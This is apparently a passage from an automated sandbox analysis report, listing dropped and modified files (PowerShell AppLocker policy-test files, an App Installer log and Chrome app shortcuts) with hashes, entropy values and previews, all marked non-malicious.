                                                                                                                Category:modified
                                                                                                                Size (bytes):3518
                                                                                                                Entropy (8bit):5.363194534471609
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:SJHjzL0GoglflglfbvxiKJETBONZ8W30SdH:4DzL0GoglflglfbZETBONZ8WhH
                                                                                                                MD5:E1A8C6E39C631AC02F1D0D19077F4009
                                                                                                                SHA1:36D0C40DE020991F2E583CAAEC354B9A0CEF6356
                                                                                                                SHA-256:747F32C2A41B6C2C7E3FFE1CE256429C0F38B6B6FD73EE8375E1293A7203D423
                                                                                                                SHA-512:DF95C826D6C5AC41014D8B1A6C369F49F2895FC52E77B0E41F756440155E5B6744829FEBCAA5485B760B9EACFA09C82A969C6FF97FD609CF5082AA3BE5D23F58
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:[Thu Apr 25 16:59:59 2024] Log File is located under: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\AILog.txt..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814750931222528]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814750931288064]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751014977536]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751015043072]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751096504320]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751096569856]..[Thu Apr 25 16:59:59 2024]{1592d} ConvertVersionToUINT64(String) -> Version [2814751232425984]..[Thu Apr 25 16:59:59 2024]{1592d} App::OnFileActivated: Activated via file..[Thu Apr 25 16:59:59 2024]{1592d} RegisterBackgroundTask -> Checking if Background Task is al

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2titzhsh.ebb.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zlartyx.40b.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqal40cl.edj.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m31idy4h.1ht.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:modified
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ms0ixla1.se3.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgypohhb.dpt.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_seo2ul3m.o2p.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sftmmkzi.o3i.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvbunhku.xav.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uucymg4t.spa.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vllnbf0w.dix.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnws2chb.ict.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4zihq54.op0.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5nayqjc.ruq.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.9912596335072044
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:80/2djTA7lxSHFidAKZdA1JehwiZUklqehRdy+3:8aK8xkwdy
                                                                                                                MD5:5432204821475E4BD59C76D445540F47
                                                                                                                SHA1:000B5ACDFDB4271A8CA2C92E64E9D1FBDDC6561E
                                                                                                                SHA-256:20409874122269AD699424569A2695981B7898AF55CA0EEA217DE089F4E553EE
                                                                                                                SHA-512:368FBD0A7D0C4718260849D59076CDF3EEC7334E427187231AA200597A5FDD81D6BE1FD0A83EBE24E09AC20722852C5FAB8504EEC8A40CC74C2D34FE65089A20
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,.....Ue.!.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.XIw...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):4.00834461831796
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8X2djTA7lxSHFidAKZdA10eh/iZUkAQkqehgdy+2:8XK8xm9Q/dy
                                                                                                                MD5:8C8879202D6D7BAAB1D1B84D02BDE6A3
                                                                                                                SHA1:C1886284F1A1A0C625E33366C035598B27F21324
                                                                                                                SHA-256:9351FB8D231F61E6D1BD402E5C8C36A1701E915E06CB4D15667A494A4837B716
                                                                                                                SHA-512:157E7F4DFB3D80EFB1FC152674E0D8803ECC16738BFE14FC30EDA62C25205D71C9598B5D10B55155AEA34D037C1E3E188BF650EA84C0D8DF4CB7160AFBA46D32
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,.....V.!.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.XIw...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2693
                                                                                                                Entropy (8bit):4.0168175814113924
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8e2djTA7ljHFidAKZdA14tIeh7sFiZUkmgqeh7sGdy+BX:8eK8Fncdy
                                                                                                                MD5:F2ACEF85CD2ED937108B43BC582E7CD3
                                                                                                                SHA1:64CD732C32E6A893209B0DAC2995BACFD95D82B0
                                                                                                                SHA-256:4CAB858F89575FE7D4C5684BA43F8446161E96E40CDD36925E50F725C986D0D8
                                                                                                                SHA-512:FA98571876EA0A02A65596D6007CD979A7EDE97A43FD8AF333F94396258EF3EA1FC53F4736D5746F51C90856D1455C26D90ECED61B52A748424956DE044C63C4
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):4.007256157814389
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:872djTA7lxSHFidAKZdA1behDiZUkwqehEdy+R:87K8x9udy
                                                                                                                MD5:AC98DF820A5239BDDD79875389AAD496
                                                                                                                SHA1:7C1DEDDDE18EDE5DBD24C7BF3EC72FACCA6F4226
                                                                                                                SHA-256:BB722FAB80126576BA0DBC0BBBACB23FF048C6E639C81538759DD2E0805A8189
                                                                                                                SHA-512:662B51AF009CAC57CE4150ED533F7075C55E1BDFB9704CBA8EDC74081FB4535BE03063B5F50A465AB78165FA40CEFF65DA01F551E6F087917AD96FE1B1EE11BD
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,......O.!.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.XIw...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 13:58:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2681
                                                                                                                Entropy (8bit):3.994628813512041
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8M2djTA7lxSHFidAKZdA1VehBiZUk1W1qehCdy+C:8MK8xd9idy
                                                                                                                MD5:DB79187BC7CD179552045BA73E873F6E
                                                                                                                SHA1:84C5C75BAD6489D96CAC543D579139254AFCF2D7
                                                                                                                SHA-256:C1F4036907C78C56E0E18B85C94F94B0D9FD1BDA16EC1C2412AD8E1F3BB73792
                                                                                                                SHA-512:B4468506FFB5E818FB8905766CE2BF23101A4D8A480E26FD33008E9F90426576822A8399EB44DD47DA13F8FE08BF370BAA38C84D5E5531BEC2819370200A65D1
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:L..................F.@.. ...$+.,.....P^.!.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X@w....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XHw....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.XHw....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.XHw...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.XIw...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............^.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                Download File
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
